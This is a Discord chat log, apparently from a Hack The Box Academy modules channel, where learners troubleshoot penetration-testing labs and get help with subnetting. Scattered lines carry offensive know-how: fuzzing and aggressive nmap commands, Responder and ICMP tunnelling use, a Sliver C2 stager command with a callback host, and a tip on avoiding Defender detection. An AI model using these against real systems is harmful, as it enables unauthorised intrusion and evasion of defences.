
u accessing an ip from internal?

if so use ligolo for all pivot

it's smoother

and less heavy on your network itself

keeps a stable pivot for you

and also dm me i can try help you

hi
can someone help me in this section https://academy.hackthebox.com/module/113/section/2164

it is better to ask your question directly

okay

Plese I did not open wirshark in my life HEEELELPPPPPPPPPPPPPPPPPPPPP

HHELEELPPPPPPPP MEEEEEEEE

you can open wireshark using this command: wireshark

but I don't understand what there is inside it

inside wireshark, there are packets

and what inside tha packets?

search internet

this is not fair at allll

HTB academy won't teach you everything, it is impossible to do, there are some things you should learn yourself even though you think it is unfair

go through fundamental modules then

should I do all the fundamentals? I did 27%

it is based on your knowledge

what

I am n00b

yeah, do all of them

all of those fundamental modules

also search internet on pentesting mindset

https://tenor.com/view/arrested-development-comedy-tired-sick-sad-gif-3399858

what does that mean?

search

can I just do the network module for now? and after the CWES exam do the rest?

idk

need help with prolabs, the machine is dead when i restart the lab environment it still isnt responsive

on dante

these are explaining the same thing

if you want to remove one please keep the one in "Attacking Common Gateway Interface (CGI) Applications - Shellshock" I like it more

You can DM what you have tried.

Any support available? I'm doing the Skill Asssessment - Hard on Abusing HTTP Misconfigurations following the Solution walkthough, but the 'admin' is not triggering the exploit. Tried couple of resets already.

#1234357888114364508

Why can't I log in on this page when I use another account that I created using a GraphQL query ?

maybe there is no function for it?

but maybe you can still query the data for the new account via GraphQL

https://academy.hackthebox.com/module/113/section/2164

someone help me please I am going to die

what is that

Check the HTB forums dude, I think they talked about this topic a lot

did you make this section

admit it

No

dude I quit learning

https://tenor.com/view/khóc-gif-617317340125722057

read the 'fatty' writeup; but the tl;dr after every modification you need to recompile the java

Did you check forums

Hi, I need help. I'm doing the Broken Authentication Skills assessments module but I can't break the OTP.

Question on modules in general from people who know more than me. I just got the annual plan which has the walkthrough, and it is tempting to use it. How long did you guys bang you head against the wall before using the walkthrough? I would rather it was just disabled, but I do NOT have the willpower to not look at it if I get really stuck 🙁

hello I need help for the "Pass the Ticket (PtT) from Linux"

I just finished that one, I could help if you have a specific question. I recall it working just from using the notes though

somebody?

can I come in dm ?

Sure

Hello guys, Attacking Enterprise Networks --> Lateral Movement. I cannot exploit the application for privesc. Whenever I set up the scheduled task and/or triggered task, it never executes bat files

should I repost it there ??

Yes

Sometimes you gotta trigger it by moving a file

Yeah, i tried that too, and deleting as well, still doesn't work

anyone can help in this?

The * indicates where to place the payload, otherwise it tries various places from what I recall

is this normal on HTB? am I expected to follow this type or rules reguarly ?

You can bruteforce vhosts

ffuf -u http://ip:port -H "Host: FUZZ.do.main"
gobuster vhost http://do.main --domain "do.main"

Thanks. I'll check

Anyone did the Attacking Thick Client Applications recently?

It should be that hard to make it? The windows machine feels too "heavy" it takes more than 5 minutes to open de x64dbg

hii guys, the website on XXE module is not loading, I've connected to VPN, i can ping it too, but cant open it in firefox or burp's chromium

could someone help pls

Some of the Windows VMs are crazy slow 🙁 I just watch the load and work around the Windows modules....

If you've never seen assembly and never tried reverse, then yeah, it's super hard. There should be a separate module on this

This is a common sentiment since it was added

Thanks for cleaning that up.

@uncut slate don't reveal answers to module questions

Thank you. @fathom pendant
New, still getting used to behavioral stuff - what #-THREAD can I put this general question about the .exe ?

DFIR/digital forensics isnt about specific exes, its about the story it tells. Have you tried googling the exe to see what its tied to. Generally speaking revealing module answers and information is prohibited

That's fair, will keep in the format on the site. I'm more so noticing a pattern with this particular .exe - seens like a LOL type problem, but the file itself is not really a problem ( according to searches). Its a built-in.

Thats where googling can come in handy

Commands often come with flags that indicate more than what meets the eye

@fathom pendant I think this issue is there for a while, there is anyplace to report it?

Its the same for paths

Not an issue, thats expected as its a Javascript element. If it takes you to the right place -> its working as intended

It does not takes me to the right place

Modules and paths are an element that should do a little drop-down element

hmmmmmmmmmmmmmm

maybe some configuration

Its working as intended on my machine

from my browser blocking it

i'll check

also not working for me

you can write /modules on the URL

yup

Its what i'm doing

just reported because is kinda weird

The HTTP Misconfigurations - Skills Assessment - Hard is still broken. There are a few of us now that are stuck and cannot progress further until it has been fixed. There is an admin bot, who is supposed to visit a page we poison to promotes us so that we can access an admin panel. The bot is not working. I haven't gotten any response yet about this. Can someone please help me get in touch with anyone from support who can fix this for us?

its not a direct link to the modules. Its a js element ¯_(ツ)_/¯

Reach out to support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Htb support team aren't paid to monitor the discord

If contacting HTB support was that simple I wouldn't be writing here asking for help.

If the problem is pinpointed #1234357888114364508 ; theres an email as well in that article

Happy New Year All!

I am slaving away at the CME skills assessment at the end of the module. Currently I am stuck at the 3rd question " Gain access to the DEV01 and submit the contents of the flag located in C:\Users\Administrator\Desktop\flag.txt. "

I have creds for ||sqlxxx+Axxl+jxxxtxx+Inxxxxx.|| Nowhere is there a ||writable share for responder shenanigans|| so getting the ||Jxxxx user|| to do something that might give something away that I want is proving something of a mystery. I've ransacked the DB|| (using regular SQL stuff not related to CME - that this was necessary strikes me as weird as this is a CME assessment and not an SQL assessment)|| and i am getting nothing.

Any hints here?

The j user has some rights over another account that might be useful

Hi guys. I'm currently in the introduction to networking module and wondered if someone could help me understand subnetting better.

an ipv4 address is split into 4 octets; 1.2.3.4 → subnetting splits a network into several smaller networks
10.10.0.0/8 → this splits the network into segments where each next 3rd octet indicates a new network
10.10.1.0 is on a different network from 10.10.2.0 etc. etc. 10.10.1.0/8 in the network means that it spans from 10.10.1.1 → 10.10.1.255
/16 splits the last 2 octets
/24 splits the last 3 each one giving exponentially more devices per division

it's given in a subnet mask 11111111.00000000.00000000.00000000 <- the /x represents the amount of 1s at the start of the mask, up to 31/32

the 0s represent the # of devices available on the network

my division was backwards

/24 < /16 < /8

my first example would be a /24 not a /8

Just completed password attacks module
Looking to know other folks' thought process for the skills assessment. Feel free to dm

I enjoyed the process, imo it's a little worse than the previous iteration -- but the update wasn't bad

That looks even more confusing. So there are up 32 ones in a mask segment and up to 24 devices on a network? If I understood that correctly?

no

32 ones means that it's the only device on the network

11111111.11111111.11111111.11111111

where are the other devices supposed to go?

😉

0s represent available devices in base2

I feel its impossible to complete it without external help for instance I have never done pivoting so i didnt know anything about socks proxy and proxychains and then nmap doesnt work well with proxychains and we gotta use nc for this one so I had no idea about all these things

so 1~.1~.1~.0~ represents 8 bits of devices that can be assigned to the network

(note that the max number per octet is 255

(the ~ is used so I don't break my finger typing out all the 1s/0s, that isn't standard notation)

you're used to counting with these "places":
1111:
1 1 1 1
thousands hundreds tens ones

But binary counts differently:
1111:
1 1 1 1
eights fours twos ones

so to count to eight in binary, if you have all four "places" as a zero:
0000
0001
0010
0011
0100
0101
0110
0111
1000

so, when you deal with IP addresses, you have eight "places" in each octet (octets are the parts separated by . )
They're called octets because they have eight places:
0 0 0 0 0 0 0 0
which is:
one-hundred-and-twenty-eights, sixty-fours, thirty-twos, sixteens, eights, fours, twos, ones

If all the places were 1 instead of zero, then it would be
128 + 64 + 32 + 16 + 8 + 4 + 2 + 1
Which = 255

so lets say you have:
0.0.0.0
this is a shorthand way of writing:
00000000.00000000.00000000.00000000

and 255.255.255.255 is a shorthand way of writing:
11111111.11111111.11111111.11111111

so subnets are defined by just saying "how many of those 32 0s are pre-filled with 1s" or "how many of those bits are free to be assigned as IPs for devices"

so let's take a typical home network:
IP of the router: 192.168.0.1
netmask: 255.255.255.0
subnet CIDR range: 192.168.0.0/24

The netmask says the first three octets (from the left) are occupied, but you have the final octet to play with:
111111111.11111111.11111111.00000000
the CIDR range tells you that the first 24 bits from the left are occupied - as you can see above; three groups of 8 ones. 3x8 = 24

so if the subnet was 192.168.0.1/16, the netmask would be:
255.255.0.0
Or:
11111111.11111111.00000000.00000000
Because only the first 16 places are occupied this time.

so with the home network, the 192.168.0.x will always be fixed, but the devices on it can be up to 255 on that final octet (x)

I see

in my opinion, the best way to get your head around it is to understand how to count in binary, so that's why I started at that point.

So then in binary, the submet mask of 10.200.20.0/27 would be
00001010.11001000.00010100.00000000? If I count in binary?

so the cidr number tells you the first 27 bits are occupied:
11111111.11111111.11111111.11100000

well the binary of the ip itself isn't important, the subnet mask's binary is important so it'd be:

11111111.11111111.11111111.11100000

which would be 255.255.255.224

each octet [octet 1] . [octet 2] . [octet 3]** . **[octet 4]

Is a separate binary number with 8 places, from 0 to 255 each

it's tricky to get your head round at first but you'll get it.

the mask would be the /N

CIDR (Classless InterDomain Routing) fills the bits from left to right

/1 being 10000000.0~.0~.0~ to /32 1~.1~.1~.1~ each number sequentially adds a bit from the left

a subnet mask WILL not be mixed with 0s, it always starts with N 1's

https://mxtoolbox.com/subnetcalculator.aspx tools like this are also very helpful

you can test out different IPs, ranges etc and see what it looks like in the different formats

I really hate to bring up subnets again but im feeling stuck and could use some help, if someone wouldnt mind..
im working on the 'subnetting' section in the "intro to networking" module... I have successfully answered the first to questions (finding the subent mask and broadcast address of 10.200.20.0/27) the last two are asking for the network and broadcast address of additional subnets... ive broken down the next 3 blocks(?) (and double checked them with ip calulator) and for whatever reason my answers are incorrect.

Im assuming each block represents another subnet? or am i totally off bass here?
thanks yall

think about what the term split into 4 subnets means. find the new mask and yeet that into the calculator

I see im def missing something here. Ill have to go back and re read the module i suppose. THank you

dm please

in footpeinting lab-medium model ,when i mount the file on my computer,i can't open the mount file by primess defind,who can tell me how to slove this problem.

sudo and root are not the same

ok，it be sloved,thank you

that or if you guys had configure the server to handle 404 in a more convenient way...

why not go with -fs XXX instead?

"NTLM is a single sign-on (SSO) solution that uses a challenge-response protocol to verify the user's identity without having them provide a password." Could this be an error? I know that only Kerberos is a SSO solutions thanks to the ticket

Its not an error, NTLM hashes are stored in lsass while a session is active

I think NTLM provides an SSO-like experience by reusing credentials cached in LSASS, but it is not a true SSO protocol like Kerberos, which uses tickets.

Think u right, thank you

Hi everyone, I’m new to HTB. I’m currently doing the Linux Fundamentals. When it says to install SELinux on my VM but I don’t have one, can I just do all the exercises in the provided VM?

I'm not sure it has enough storage but go for it, also any changes you make to it will be reverted the next time it spawns

Thank you

who did that?!

i did, because it's a weird comment

but it is just a song...

don't care + it's irrelevant

it is called The Finger Family

Hi, I am new in HTB and working on "Web Requests" lab. I stuck at "CRUD API" and how I can get the field names of those API endpoints? Thanks.

do you mean you don't care about my feelings?

Hi, you can DM if you want

i mean i don't care that it's from a song, and it's irrelevant to this channel

the section should have walked you through figuring it out

but I felt tired today so I thought that will make me feel better

then do the silliness in #general, not #modules

I am sorry but people there they don't talk to me because I am n00b

but here I feel home

because there is n00bs like me asking about things

i don't care

irrelevant conversations and such don't belong here

do you mean you don't care about my feelings?

i don't care. you're acting weird, that's why people choose not to interact with you. it's got nothing to do with your 'noob' rank

now quit adding unnecessary stuff to the channel, and follow directions when asked

I don't understand why you blame me but it's okay thanks

i blame you because its your actions

what did I do?

making irrelevant comments and messages in chats where it's not wanted/needed

okay guys if someone here said that I bother him please tell me

let's see if I did something wrong

If you want to yap go to general. It's that simple

if you think I did something wrong you can send me to the jail

dude i'm just enforcing THE RULES; off-topic conversations don't belong here. Sometimes they happen, but there was ultimately an on-topic reason they get started

I'm just going to put this here for anyone who struggles with this in the future: in HTTP Misconfigurations - Skills Assessment - Hard the attack won't work unless you add httpattacks.htb to your host file. This is not explained in the module and should have been added to the module in a note, i.e: vHosts needed for this questions: httpattacks.htb .

I'm in the Initial Enumeration of the Domain module and the instance is very laggy and sometimes kicks me out of pwnbox ssh in the middle of the scan

I'm honestly afraid that the exam will be in such low-quality instances.

Hey guys I'm doing the command line fundamentals and I'm stuck a tthis " Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file. " I already tried differnt methodes, looked online but can't find it. I tried the where /R C:\ waldo.txt, i tried to search all .txt and doa findstr on waldo.txt but still nothing any idea?

Hi again, I'm back. My problem may be similar to the one above. I am trying to use the command ssh to connect and I get a kickback as the authenticity of the host cannot be resolved. Am I inputting the command in wrong? I am typing it exactly as I see it.

What are you exactly typing

Assume the first part is redundant - ssh htb-student@10.129.191.162

And from where are you doing IT? Pwnbox or your own vm?

Pwnbox in the HTB Viewer

Which module is it?

Linux Fundmentals.

Weird when you do ssh htb-student@<ip> what do you get?

@final cypress

You have to remove the bracets

@faint hill Please take care not to post content or spoilers from modules above tier 0

In htb modules. The [] are what you have to write like [say a word] you input —> helloworld without the []

Ah

It should work now

so basically you can't say what you've done even in coded form and with it obscured? Many people will hesitate to help someone who just asks for a nudge. But hey.

So if anyone can help me with the last 2 questions of this module (Crackmapexec Module final skills assessment) that would be great mmmkay....

Is it supposed to ask me for a password next?

Yes

Spoiler tag doesn't do anything. It's against TOS to post content from modules above tier 0. Anyone who has completed this doesn't need the additional info like the attack paths etc.

Yes

@final cypress ok for you?

You can DM me

Yes

I think I found the password.

Psheewwww... getting the hash in module module 216 section 2301 was a beast.

it's best to say module and section name instead of numbers; the numbers are basically meaningless

except for section 391 from module 611, who could forget that one

Any update on this for me?

I transcended into script kiddie now. I understand the concepts but not sure which exploit sticks, so I just run all the scripts and hope 1 sticks. Any beginners here?? I will assist.

nmap 10.129.2.49 --script auth,broadcast,brute,default,discovery,dos,exploit,external,fuzzer,intrusive,malware,safe,version,vuln

The main thing I gotta say about any of the modules is that I'm happy with the diversity in subject matter and I'm excited to see what else HTB will offer in the future. My main goal for 2026 as far as HTB is concerned is to grind the modules and get as many challenges completed. 🦾

Anyone got openVPN connection issues?

Or just me?

Is anyone familiar with the author of the "ADCS Attacks" module? I have a question about how one of the sections is presented

help

im playing the meow and its just infinite pinging

it shouldnt take that long

is that a box? #boxes

@sour snow Please take care not to post content from modules abover tier 0

You can ask your question without posting screen shots that reveal info like that

Understood, thank you

Module: Active Directory Trust Attacks
Section: Unconstrained Delegation Cross Forest

My question is, there are 3 requirements for the attack to work, but they did not cover anything about how to enumerate if these were met in the first place.
The two-way trust between domains can easily be enumerated, but how to enumerate whether the other two requirements are met?
i.e. TGT delegation allowed on the trust, and selective authentication is disabled.

Any help would be appreciated

Also another question I have, why do I have to be on the DC of domain A to be able to abuse cross-forest unconstrained delegation?
Why for example SQL01 won't work? I didn't quite understand this part.
I'll review and try to understand but if anyone can just explain this to me it'll be great.

i am not sure but I beleive Powerview does the job

something like Get-DomainTrust -Domain <domain>

Is there a compiler binary for responder so that we can easily transfer it to compromised targets machines?

Responder is a Python script.
https://github.com/lgandx/Responder

Nope, it doesn't.

Hello please is anyone of you completed tthe penetration testing Footprinting module?

Tried that.

I am stuck at the footprinting lab - Hard. Please is there any help.

Yes but it requires the whole repository to work , not only the standalone Python script so it is not very easy to transfer to the target

Module: Active Directory Trust Attacks
Section: Unconstrained Delegation Cross Forest

Since the module did not explain anything regarding how to enumerate if the requirements are met or not, I tried to do so on my own.
I was able to come up with a PowerShell command that enumerates both the SelectiveAuthentication and TGT Delegation on the trust level.

When I tried the command on the lab, it says that neither are enabled.

PS C:\tools> Get-ADTrust -Filter * -Properties SelectiveAuthentication,TGTDelegation | Format-Table Source, Target, SelectiveAuthentication, TGTDelegation -AutoSize

Source                 Target                 SelectiveAuthentication TGTDelegation
------                 ------                 ----------------------- -------------
DC=inlanefreight,DC=ad logistics.ad                             False         False
DC=inlanefreight,DC=ad child.inlanefreight.ad                   False         False

Now for SelectiveAuthentication I understand why, and that it needs to be disabled for the attack to work.
But TGT delegation is required for the attack to work according to the module, and even though the output says it's disabled for logsitics.ad, the attack worked.
Can someone please explain what am I missing? or if the command is wrong?

if i am not mistaken if sid filtering is disabled and there is a trust, then the attack should work , of course in addition to selective authentication

but someone else please confirm

the flag being false (tgtdelegation) shouldn't be your sign that the attack isn't going to work

i still didn't do the module but i remember one of the seasonal machines having a similar attack situation

Hi i am facing difficulty in setting up ODAT for the Oracle TNS section of footprinitng module.
There's always a dependency missing when i try to run it.
i have used all the commands given in the module for settinh up odat.

Interesting.

Thanks for the answer.
Will try to confirm that.

ask your question directly, more people would like to help in that case

i would say check forums on this module, there are a lot of hints there

Hi Guys if there is someone here who has completed hacking wordpress please let me know

also ask your question directly here

@acoustic owl You studying Responder? Let's talk in DM.

I don't think there's that much to study with Responder 🙂

What you mean, seems like a complex tool to me; or is this a "these are not the droids you're looking for".

Responder is a software with not too many options.

https://www.virtuesecurity.com/kb/responder-multirelay-pentesting-cheatsheet/

The description has tags for aleast 10 different key concepts: [#LLMNR, #NBT-NS, #MDNS, #HTTP, #SMB, #FTP, #MSSQL, #FTP, #LDAP, #NTLM, #NTLMSSP, etc.] - We should prob. move over to #general ?

Maybe, your approach to use is different, that's really what I'm curious about.

These are just different services that responders react to when a request comes in.

In my case, it was so dang noisy though. I feel there is much more to learn and discuss on this, if you're interested.

hi, in the sliver module (module 241 section 2637) - when i run stage-listener --url tcp://PWNIP:4443 --profile htb it attempts to compile forever and eventually fails entirely. This appears to be a known issue (see bug report below)

https://github.com/BishopFox/sliver/issues/2073

What would the recommendation be here? Previously I was using the prior version which, unforuntely, also had bugs that appeared to break functionality and the recommendation was to update.

Seems noisy to me, but maybe its relative to who is listening.
If you had to place a mark on your proficiency with the tool between 1 - 10, where are you with it, and how did you get there?

What exactly do you mean by noisy? The tool listens on the specified interface and responds when a request comes in. It then requests authentication.

based on the developers comments - it seems the course instructions/steps likely need to be changed

Could anyone help me with Crackmapexec skills assessment Q3 please?

now sure what this is

Thats from the link you shared. Did you go through the issue? Someone claims having fixed the problem.

https://github.com/BishopFox/sliver/issues/2009

i must have posted the wrong link, this is the right spot

Guys which terminal emulator would you recommend and why ? The most important I want it to do it to be able to split screen when I am in ssh session (keeping the session / ssh connection ) to both new created windows .

seems like a general chat topic, id ask there

Theres another issue in the same section of this module (241, 2637, Sliver) --> Generate stager no longer has --lhost syntax

That issue was opened back in October 2025. 1.6.0 was released yesterday and it includes a bunch of fixes. How about you try the latest version?

ive tried old and new, currelty using [*] Client v1.6.0 - Compiled 2026-01-01 10:50:59

Im on tags/v1.5.42 and I dont have any issues.

Additionally, if you build on personal VM, I recommend you stick to tags/v1.5.42 but nuke the built-in amsi bypass before compiling. That thing is cancer and will light up MDAV like a christmas tree.

Anyone who has already setup ODAT. Need help in setting it up. Unable to configure it

any idea how i can nuke the github 1.6 version so i can reinstall and retry 1.5.42

Its a binary. Delete the binary. 😅
If you installed via apt you know what to do

i think its more than that - theres services running for it

yep, client wont start, service also wont run

client likely wont connect and fails due to the service

I'm just not proficent with the tool so I can't tell what's important.

ok so kali repo of sliver 1.5.42 is not installing the service, and thus the client will not start

pulled down repos from github for that exact version cited in module - its broken

Connection to server failed context deadline exceeded

anyone able to help with sliver issues for the sliver module by chance? I'm not sure what else to do other than just skip the entire module

Did you figure it out?

Theres another issue with the sliver module unfortunetly - this syntax and work flow is no longer valid nor present in the sliver framework

generate stager --lhost 10.10.14.244 --lport 4443 --format csharp --save staged.txt

what is the pathway to contact support for acadmey to see how I should proceed? This module doesnt appear to be functional

#1234357888114364508 ?

If you want to find the name of a network inferface set at 1500, it's the ip command and what else? I found out the answer.

Question for intro to Linux OS

i contacted through the official support channel to HTB

thank you though

hello guys i've just launched the first skill assessment for windows privesc but i can't even ping the ip (vpn working as it should be )

weirdly that 've used the same vpn for the whole sections, do i need a specific vpn for the skill assessment

No but you can try switching if you think there is an issue with the vpn

you mean region or the protocol ?

Both

i've tried to change region and protocol , i can't even ping i'm not sure why

Hi anyone who has a running ODAT tool. I am unable to set it up. Tried apt install , docker

I am using macbook m1

Run each install step independently instead of from the script, it often breaks

Idk htb boxes aren’t going good for me neither rn

I am in the Further Credential Theft part of the Windows Privilege Escalation module, and I am encountering an issue where I uploaded my own Lazagne.exe form the official repo, but when I run it it didn't find the credentials that it was supposed to.
However when I run the one in C:\tools\Lazagne.exe it does find the proper credentials ...
Is that something common?

Analyzing Evil With Sysmon & Event Logs module seems to need to be updated from MEDIUM to HARD?

no?

No, why? @last walrus

Did you get any traction?

Hello there, just completed the Penetration Tester path, and I therefore have a few cubes stored. Does anyone have feedback regarding the Introduction to Windows Evasion one ?

hi guys ,need some help in this part
https://academy.hackthebox.com/module/296/section/3400
I know the correct and but it still saying wrong

is this working or need to input another formet ?

hi guys, haven't touched on htb in a minute.

😅

using pwnbox

I need help on this

okay changed it to http 👍

did anyone ever solved the clock skew error issue persisting with "ntpdig: no eligible servers"?

try faketime; faketime "$(ntpdate -q $Target | awk '{print $1 " " $2}')" <cmd>

you could also just use ntpdate, sudo ntpdate DC_IP_ADDRESS

i did but the same output kept coming up

both ntpdate and faketime

Try it from the pwnbox then

Sup

@zealous cloud What moduels you working on

CDSA (SOC Analyst path)

i'm going for the cert

Think I'm doing the same.

no mic?

@marsh sandal Audio check.

lol

this is a reminder not to share solutions regarding tier 1 or higher modules if you're actively working on them in the vc

i don't wanna have to come in there to monitor

I think the issue is that i'm running discord inside a VM

Kernel issues?

Don't run it in a vm?

@uncut slate This channel is for module talk, please take it to DM's

@sudden spire what module are you streaming?

retired content

machine

ah couldn't tell if it was a retired machine or academy beta in the preview

carry on

Could anyone give a nudge for the last question on Windows Lateral Movement Skills assessment.
What's the content of the flag located at DC C:\Users\Administrator\Desktop\flag.txt?

why cant i connect im using pwnbox?

I think I did everything correct in the module, but it does not seem to connect. : https://academy.hackthebox.com/beta/module/39/section/407

I set the LHOST, RHOSTS, and used the correct exploit, but still it does not work

It ran till the stager process, and then the server stopped

Yup, I followed the correct steps, still it does not work. When I reset the machine and retried the steps, now it says cant check exploitability

Figured it out, it was the firewall

i need help, password attacks pass the certificate

https://github.com/fortra/impacket/issues/2078

this fixes it

for anyone who needs it

the labs from Web Attacks - IDOR are super slow, it takes forever to load

Hey all I'm at "Active Directory Enumeration & Attacks" module in the "LLMNR/NBT-NS Poisoning - from Linux" section. I can't quite get the first question.

What am I supposed to do this is a really confusing one for me.

I ran responder and connected via SSH to the target. Should the hash just appear in reponder? I looked at the solution and it says ||the hash should just appear after 5 minutes||.

Did you run responder on your machine or on the SSH machine?
I do not remember the module but you have to run Responder on the SSH machine.

Oh I see

Hello guys i wanna ask a dumb question sorry

But how do you know if you fully understood a certian section so you can move on to the next?
Im afraid of doing a section or a whole module without fully understanding it and it will haunt me later on and i will probably forget it

This is known, its trying to handshake 'welovefonts' which is defunct, if you open the network inspection tab you can find the request and add it to a block list for your browser and it should load fine afterwards

Its simple: read your notes, do the lab with your notes, if you can do so - then move on

If you want to dive deeper into a topic beyond whats presented thats on you

So basically doing the lab with my notes and doing the method of trying to explain the subject as if you were explaining it to a beginner is good enough?

Basically, can your notes guide you or provide enough information to move you forward. In a lot of cases, the examples in the module section don't line up exactly with what you need to do in a lab

Thank you so much MarcieLee

Hey all,
I'm on "Enumerating & Retrieving Password Policies" and I can't get ldapsearch to find the password policy. I am getting these errors: (I tried adding the IP to the /etc/hosts file)

└─$ ldapsearch -H 10.129.128.185 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength       
Could not parse LDAP URI(s)=10.129.128.185 (3)
                                                                                                                                                     
┌──(kali㉿kali)-[~/HTB-ACADEMY/Modules/ActiveDirectoryEnumerationAttacks]
└─$ ldapsearch -H ldap://10.129.128.185 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
ldap_sasl_bind(SIMPLE): Can't contact LDAP server (-1)

Anyone knows why its not working?

try using ldaps://

i mean the error says can't connect to the server

so that's probably why it's not working

altohugh that command looks complex i don't recall doing that but i could just be forgetting

Hi, I am struggling with the skill assesstment of the Password attack module. I have every pass from every user, but I am unable to get the hash of the domain administrator and there is nothing else to do. nxc does not work for me, and I have reset everything many times, anyone could help?

Anyone can help me in XPATH-Authentication ByPass?

Got the same error, unfortunately.

It's supposed to return the password policy of the domain

Well it says it can't connect to the server

troubleshoot network issues

ie. can you ping the server etc

what's the issue?

Sounds like they did a tier 1 module or something. There aren't rewards for that. You can see the rewards here https://help.hackthebox.com/en/articles/7992318-friend-referral

It says the referred user, not the person who referred them, gets 20 cubes after their first module completion

up to

Need help at Skill Assessment - File Inclusions Module. I don't get the source code of the apply.php

dm me

hi uhh i have a problem with windows fundamentals after a short time i always get kicket from the target server

[16:33:08:581] [9820:9821] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: US/Central
[16:33:08:981] [9820:9821] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[16:33:08:981] [9820:9821] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[16:33:08:991] [9820:9821] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[16:33:08:991] [9820:9821] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[16:34:14:897] [9820:9821] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[16:34:14:897] [9820:9821] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[16:34:14:897] [9820:9821] [INFO][com.freerdp.client.common] - Network disconnect!

i tried my the browser mashine
from windows to windows and extern

.....

Make sure not to run the in-browser vm and the vpn at the same time. Also make sure to only have one vpn connection on your machine

connection timed out
That leads me to believe a connection problem

it works thanks

I need help with the Footprinting SMTP module.

gimme a sec to pull up my notes; but you can reiterate your problem here from #1457170717027209247 since i'm closing that thread ❤️

i used smtp-user-enum script, not the msfconsole script

smtp script gave me less usernames than msfconsole and none of them worked for the final question. smtp script have the same usernames as msfconsole but less of the,

look at my screenshot

dm me with the hash of the wordlist you're using i'll see if I can replicate any info

also your screenshot contained some info related to some of the other questions; so I deleted the message

i was able to get the answer with the msfconsole script as well

When I go to download it from the page. It downloads to my local machine, and idk how to transfer files into my htb machine, I'm sure they wouldnt allow that anyways for security purposes. SO. I realized I could try to open the browser inside of the parrotos VM. Then nav to the HTB login page. Login, Then download it inside of the vm. Well when that is tried. The Fullscreen OR the box iside of the htb page just glitches tremendously and is inoperatable. SO was forced to use msfconsole which gave me a pretty lengthy list of usernames.

that's because of how the screen resolution is being pulled; it loads from the latest screen update, which would be the one you just navigated to, which would have a much lower resolution, which then prompts another screen update which is at a much lower size....

@west yacht footprinting is a tier 2 module, please refrain from sharing scan outputs

make sure to run an nmap -p- scan there may be a port you missed; if that doesn't work reset the lab. It's relevant to the creds you were given in the overview of the lab

understood, i didn't know. won't happe nagain and thanks for the advice.

https://tenor.com/view/yes-sir-gif-22367921

my fav discord channel is htb channel lol

Module:
Pivoting, Tunneling, and Port Forwarding > ICMP Tunneling with SOCKS

Pivot Terminal:
ubuntu@WEB01:~$ sudo ./ptunnel-ng -r10.129.202.64 -R22
[inf]: Starting ptunnel-ng 1.42.
[inf]: (c) 2004-2011 Daniel Stoedle, daniels@cs.uit.no
[inf]: (c) 2017-2019 Toni Uhlig, matzeton@googlemail.com
[inf]: Security features by Sebastien Raveau, sebastien.raveau@epita.fr
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.
[inf]: Dropping privileges now.
[inf]: Incoming tunnel request from 10.10.14.76.
[inf]: Starting new session to 10.129.202.64:22 with ID 58542
[inf]: Incoming tunnel request from 10.10.14.76.
[inf]: Starting new session to 10.129.202.64:22 with ID 43690
[inf]: Received session close from remote peer.
[inf]: Session statistics:
[inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 8/ 6/ 0 Loss: 0.0%